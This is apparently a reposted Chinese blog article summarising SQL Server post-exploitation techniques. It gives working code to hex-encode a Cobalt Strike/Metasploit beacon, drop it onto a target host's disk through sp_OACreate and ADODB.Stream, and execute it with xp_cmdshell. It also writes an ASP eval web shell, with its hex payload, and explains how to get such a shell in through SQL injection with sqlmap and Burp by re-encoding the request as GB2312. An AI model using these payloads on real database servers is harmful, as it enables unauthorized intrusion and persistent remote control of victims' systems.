紧接着将生成的CS/MSF攻击载荷文件转换为HEX编码。
Linux exe -> hex
xxd -ps beacon.exe hex.txt
python exe -> hex
import binasciifilename = 'beacon.exe'with open(filename, 'rb') as f:content = f.read()print(binascii.hexlify(content))
010editor exe -> hex
利用这种方式拷贝下来的HEX也能使用certutil.exe -decodehex正常解码,但如果要用OLE组件写入时就还需要做下处理,将空格、换行都删掉,全部放在一行即可。
EXE文件落地
将我们上边转换好的HEX编码放在第一行,加上0x,然后在本地的Navicat Premium数据库管理工具中执行即可,这时可以看到cs.exe文件已经成功落地到目标主机的磁盘。
xp_cmdshell组件调用的是cmd.exe,所以在利用这种方式写入大文件时可能会出现字符长度限制等问题。
DECLARE @DATA VARBINARY(MAX) = 0x-hexDECLARE @filepath VARCHAR(MAX) = 'C:\Windows\temp\cs.exe'DECLARE @ObjectToken INTEXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUTEXEC sp_OASetProperty @ObjectToken, 'Type', 1EXEC sp_OAMethod @ObjectToken, 'Open'EXEC sp_OAMethod @ObjectToken, 'Write', NULL, @DATAEXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, @filepath, 2EXEC sp_OAMethod @ObjectToken, 'Close'EXEC sp_OADestroy @ObjectTokenSELECT @filepath
点击发现是可以上线的。
exec master..xp_cmdshell "cmd /c C:\Windows\temp\cs.exe"
MSSQL Getshell中文路径
首先通过上面的方式将bat文件转换成hex,然后到文件落地。
文件内容:
echo ^<^%%eval request("aaaaaa")%%^>^md > C:\Windows\Temp\马赛克\1123a.asp这里需要注意的是因为MSSQL是通过GB2312解码的,所以我们需要更改一下这个编码格式。
DECLARE @DATA VARBINARY(MAX) = 0x6563686f205e3c25256576616c20726571756573742822616161616161222925255e3e203e433a5c5c57696e646f77735c5c54656d705c5ce9a9ace8b59be5858b5c5c73622e617370DECLARE @filepath VARCHAR(MAX) = 'C:\Windows\temp\cs.bat'DECLARE @ObjectToken INTEXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUTEXEC sp_OASetProperty @ObjectToken, 'Type', 1EXEC sp_OAMethod @ObjectToken, 'Open'EXEC sp_OAMethod @ObjectToken, 'Write', NULL, @DATAEXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, @filepath, 2EXEC sp_OAMethod @ObjectToken, 'Close'EXEC sp_OADestroy @ObjectTokenSELECT @filepath
紧接着执行。
exec sp_cmdExec 'cmd /c C:\Windows\Temp\c.bat';但是这是在于我们拿到SqlServer数据库账号和密码的情况下可以这样做,但是如果我们没有拿到这个账号密码该怎么做呢?
比如说现在有一个sql注入的站点,并且你已经拿到了os-shell的权限,可以执行命令,但是无标不出网,并且有中文路径,如何写shell呢?
将sqlmap代理到burp 抓echo写马的数据包
将这段hex通过UTF-8解码
没有乱码,同理,如果通过GB2312解码一定会乱码,mssql调用cmd使用的便是GB2312编码
将echo xxx 通过GB2313 hex编码
对比之前UTF-8和GB2313编码的不同
burp中原来UTF-8编码的hex改为GB2313编码的hex 然后Forward
这样就可以写入shell了。
这里为什么需要改为GB2312 hex编码,因为MSSQL解码使用的就是GB2312。
而SQLMAP使用的是UTF-8编码和解码,所以这两个是不兼容的,所以需要手动去发包的。
原文始发于微信公众号(Relay学安全):SqlServer相关总结
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论